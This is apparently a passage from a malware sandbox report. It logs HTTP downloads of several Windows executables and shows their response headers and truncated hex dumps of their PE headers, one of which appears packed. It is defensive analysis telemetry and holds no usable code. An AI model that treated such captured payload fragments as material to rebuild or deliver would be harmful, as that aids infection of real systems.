Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 11:59:47 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 11:59:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 11:59:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 11:59:50 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 11:59:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 11:59:51 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 30 Sep 2024 11:59:54 GMTContent-Type: application/octet-streamContent-Length: 414248Last-Modified: Mon, 30 Sep 2024 04:37:16 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66fa2afc-65228"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5c 28 fa 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 22 06 00 00 08 00 00 00 00 00 00 4e 40 06 00 00 20 00 00 00 60 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 40 06 00 4b 00 00 00 00 60 06 00 f8 05 00 00 00 00 00 00 00 00 00 00 00 2c 06 00 28 26 00 00 00 80 06 00 0c 00 00 00 c8 3e 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 20 06 00 00 20 00 00 00 22 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 05 00 00 00 60 06 00 00 06 00 00 00 24 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 06 00 00 02 00 00 00 2a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 40 06 00 00 00 00 00 48 00 00 00 02 00 05 00 b0 2e 06 00 18 10 00 00 03 00 02 00 11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b7 dc 3b 9f 38 e4 60 f0 c6 77 a2 a5 08 0f e5 a0 19 86 ff d4 8b 72 8b 62 1a 84 93 8a e4 20 c2 ed 43 04 47 41 ba f2 7e 7a 78 46 ae 63 c0 40 51 65 ff b9 38 88 d6 05 c1 93 38 24 d9 ec 61 f5 87 e5 87 93 4e f9 1d 21 51 1e 34 66 b5 13 c6 9a 5c 0e 84 ea 1a b4 64 df 14 61 ad 9e 65 39 34 05 db d7 5e 51 2a 38 66 a9 76 e5 02 07 e4 77 e3 57 1c c6 77 48 09 6b 51 f2 f1 1b 2c d2 db bd 33 c3 41 24 23 b9 e0 d8 50 16 8c 9c e2 87 b4 29 cf f4 53 d0 8b ee 6f 81 91 e8 62 2b 67 59 7f 5c 6f ae 8e b1 f0 d1 35 84 6d e5 29 ea 1d 32 1b 74 cc ab 35 d7 43 a6 c5 26 7a 37 ad 89 9d 1d 2d 8f 44 db 9e d9 c5 b8 71 21 11 b8 d6 8e 1f 8f 6f dc f4 e7 a3 b7 14 ba 07 84 d9 57 32 46 9c cb f4 6e 3b bb ee 7e 8a 39 2e 92 c7 e5 09 71 34 18 6c 9e 56 96 0f c6 4f 0c 70 18 6c dc f5 6d 7d e3 a0 27 d3 c4 cf 3a d1 97 45 b9 f6 cb bd e6 99 2f 25 32 ff fb b7 5f 01 c8 67 05 ca c0 3d 19 37 7f 0a d1 e8 96 f6 cf b7 fa 6d 8b 84 e8 d4 e2 1c dc b6 30 5e 87 6
